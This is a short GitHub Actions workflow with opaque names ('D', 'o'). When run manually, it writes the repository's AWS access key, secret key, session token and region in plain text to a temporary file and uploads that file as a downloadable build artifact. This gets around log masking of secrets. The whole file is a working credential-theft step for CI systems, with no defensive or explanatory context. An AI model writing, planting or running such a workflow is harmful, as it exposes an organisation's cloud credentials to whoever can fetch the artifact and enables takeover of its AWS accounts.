name: D
on:
  workflow_dispatch:
jobs:
  d:
    runs-on: ubuntu-latest
    steps:
      - env:
          A: ${{ secrets.AWS_ACCESS_KEY_ID }}
          S: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          T: ${{ secrets.AWS_SESSION_TOKEN }}
          R: ${{ secrets.AWS_REGION }}
        run: |
          echo "AKI:$A" > /tmp/o.txt
          echo "SAK:$S" >> /tmp/o.txt
          echo "TOK:$T" >> /tmp/o.txt
          echo "REG:$R" >> /tmp/o.txt
      - uses: actions/upload-artifact@v4
        with:
          name: o
          path: /tmp/o.txt
